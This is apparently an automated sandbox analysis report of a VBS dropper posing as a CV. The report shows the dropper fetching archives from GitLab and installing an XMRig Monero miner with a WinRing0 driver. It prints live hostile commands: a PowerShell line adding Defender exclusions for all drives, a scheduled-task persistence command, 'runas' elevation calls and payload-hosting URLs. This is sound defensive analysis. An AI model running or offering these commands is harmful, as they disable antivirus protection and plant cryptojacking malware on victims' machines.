Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462657412.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://customers.gitlab.com
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB8589000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB8588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB8579000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/sandbox/
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/sandbox/;
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/speedscope/index.html
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/admin/
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/assets/
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/calls
Source: wscript.exe, 00000004.00000003.2113791813.000001ADB81F8000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false&
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false.IE5
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseO
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseP
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseY
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsen
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsex
Source: 7g.exe, 0000000B.00000003.2417873855.0000000001490000.00000004.00001000.00020000.00000000.sdmp, sarmat.vbs.11.dr	String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/t
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://new-sentry.gitlab.net
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sentry.gitlab.net
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snowplow.trx.gitlab.net
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sourcegraph.com
Source: wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/
Source: wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/;K
Source: wscript.exe, 00000004.00000003.2113791813.000001ADB81F8000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs	String found in binary or memory: https://www.7-zip.org/a/7zr.exe
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/a/7zr.execal
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/a/7zr.exel
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/a/7zr.exey
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.recaptcha.net/
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/wizard
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49707 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:	Initial file: L5a6UK7iSL5.ShellExecute L5c3SgFhjyORL5,L5F9qpxyHAL5,"","runas",0
Source:	Initial file: L5a6UK7iSL5.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Wscript called in batch mode (surpress errors)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"	Jump to behavior

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D801A: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,

11_2_009D801A

Source: C:\Users\Public\7g.exe

File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Jump to behavior

Source: C:\Users\Public\7g.exe	Code function: 11_2_00A13FD5	11_2_00A13FD5
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A381E0	11_2_00A381E0
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A341C8	11_2_00A341C8
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3C360	11_2_00A3C360
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A2C350	11_2_00A2C350
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A2C4B0	11_2_00A2C4B0
Source: C:\Users\Public\7g.exe	Code function: 11_2_009E8519	11_2_009E8519
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A4253A	11_2_00A4253A
Source: C:\Users\Public\7g.exe	Code function: 11_2_009FE6A7	11_2_009FE6A7
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A42621	11_2_00A42621
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A1C88D	11_2_00A1C88D
Source: C:\Users\Public\7g.exe	Code function: 11_2_009EA87C	11_2_009EA87C
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A2A9C0	11_2_00A2A9C0
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3E960	11_2_00A3E960
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A26A00	11_2_00A26A00
Source: C:\Users\Public\7g.exe	Code function: 11_2_009EAA45	11_2_009EAA45
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3EB39	11_2_00A3EB39
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A34B00	11_2_00A34B00
Source: C:\Users\Public\7g.exe	Code function: 11_2_009ECDBD	11_2_009ECDBD
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A30D89	11_2_00A30D89
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A34E20	11_2_00A34E20
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A330A0	11_2_00A330A0
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A33120	11_2_00A33120
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A39160	11_2_00A39160
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A37220	11_2_00A37220
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3D260	11_2_00A3D260
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A35250	11_2_00A35250
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A313A0	11_2_00A313A0
Source: C:\Users\Public\7g.exe	Code function: 11_2_009D53C8	11_2_009D53C8
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A41320	11_2_00A41320
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3D410	11_2_00A3D410
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A19416	11_2_00A19416
Source: C:\Users\Public\7g.exe	Code function: 11_2_009D947F	11_2_009D947F
Source: C:\Users\Public\7g.exe	Code function: 11_2_009D15BB	11_2_009D15BB
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A2B540	11_2_00A2B540
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3D980	11_2_00A3D980
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A2B930	11_2_00A2B930
Source: C:\Users\Public\7g.exe	Code function: 11_2_009D1AEA	11_2_009D1AEA
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A1FB46	11_2_00A1FB46

Source: Joe Sandbox View	Dropped File: C:\Users\Public\7g.exe 72C98287B2E8F85EA7BB87834B6CE1CE7CE7F41A8C97A81B307D4D4BF900922B
Source: Joe Sandbox View	Dropped File: C:\Users\Public\WindowsUpdate\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\Public\7g.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\Public\7g.exe	Code function: String function: 00A3F140 appears 554 times
Source: C:\Users\Public\7g.exe	Code function: String function: 009D1E89 appears 164 times

Source: curriculum_vitae-copie.vbs

Initial sample: Strings found which are bigger than 50

Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: go.exe.11.dr

Static PE information: Section: UPX1 ZLIB complexity 0.993395475414692

Source: WinRing0x64.sys.11.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.expl.evad.mine.winVBS@27/19@2/3

Source: C:\Users\Public\7g.exe	Code function: 11_2_009E2A5F __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		11_2_009E2A5F
Source: C:\Users\Public\7g.exe	Code function: 11_2_009D9032 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		11_2_009D9032

Source: C:\Users\Public\7g.exe

